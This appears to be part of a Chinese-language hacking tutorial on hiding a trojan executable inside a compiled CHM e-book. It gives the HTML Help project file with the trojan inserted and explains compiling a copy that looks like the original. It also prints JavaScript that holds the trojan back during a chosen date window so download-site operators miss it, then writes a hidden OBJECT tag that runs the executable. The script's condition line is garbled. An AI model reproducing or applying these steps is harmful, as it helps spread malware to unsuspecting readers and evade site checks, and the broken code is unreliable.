|
黑客技术 详解电子书(CHM)木马病毒(2) Compatibility=1.1 Or later
Compiled file=access.chm ;把access.chm改为你要生成的电子书名
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="辅助选项","access.hhc","access.hhk","icyfox.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
;把上面的"辅助选项"改为你第一步时得到的标题栏文字,"access.hhc"及"access.hhk"分别改为你第三步得到的文件名
[FILES]
icyfox.htm
Window 按钮突破专家.exe ;把它改为你要嵌入电子书的木马程序名
最后,用HTML Help Workshop打开icyfox.hhp,点击左侧最下面的编译按钮,稍等一会就可以在“G:\CHM木马”目录中发现已经编译好的带有木马的电子书access.chm,打开看看!
加入电子书中的程序是不是运行啦?!还和原来的电子书满相似的吧!当然由于我直接用的上面的icyfox.hhp直接来编译出来的,并没有对电子书进行更细致的调整,所以和原来的相比有点差异,当然如果你愿意,做出和原电子书一样的界面也可以的!^:^
当然我直接写出icyfox.hhp这个文件的内容,也决不是为了多赚稿费,一方面免去制作电子书的过程说明,更重要的是因为它对你做一个可以“传染”其他电子书的木马是有作用的,不过鉴于这样做已经具有病毒的传染特性,其危害性过大,所以请不要找我要方法和代码,也请自己想出方法写出程序的各位大哥,不要进行大规模的散发!
看到这里你也许会质问我所说的“优点”中的第四条根本没法实现,因为当“下载站点”的站长打开时同样会运行木马,所以他就不会在为你“免费服务”啦,咋办?
最会,就让我和大家一起解决这点小问题,如何逃过那些“下载站点”的木马检测,而让他们不知不觉的帮助你传播电子书木马!
分析一下,那些“下载站点”一般不会把你提供的电子书进行反编译吧?!所以只要在他们打开你的电子书查看时,不运行你的木马程序,这样他们就会放心的把它放到自己的站点上供其它人下载!我的方法是在icyfox.htm中加入用于判断时间的Javascript代码,当大于某日期时,再动态写入运行木马的HTML代码,从而逃过检测,修改后的icyfox.htm如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<SCRIPT LANGUAGE="javascript">
//以下是在2008年4月11日至2008年4月18日之内不运行木马
var ris = 11; //起始日
var rie = 18; //结束日
var yue = 4; //月
var nian = 2008;//年
var riqi = new Date();
var d = riqi.getDate();
var m = riqi.getMonth()+1;
var y = riqi.getYear();
WIE=navigator.appVersion;
//if(WIE.indexOf("在此加入代表Win2003的字符串")==-1){执行下面的代码}//用这句可以防止在Win2003中运行木马
//我因为没有Win2003所以不知道版本该如何写,请装Win2003的兄弟把他改好!
if(y!=nianm!=yued<risd>rie)
{
document.write('<OBJECT Width=0 Height=0 style="display:none;" TYPE="application\/x-oleobject"');
document.write(' CODEBASE="Window 按钮突破专家.exe">');
| 
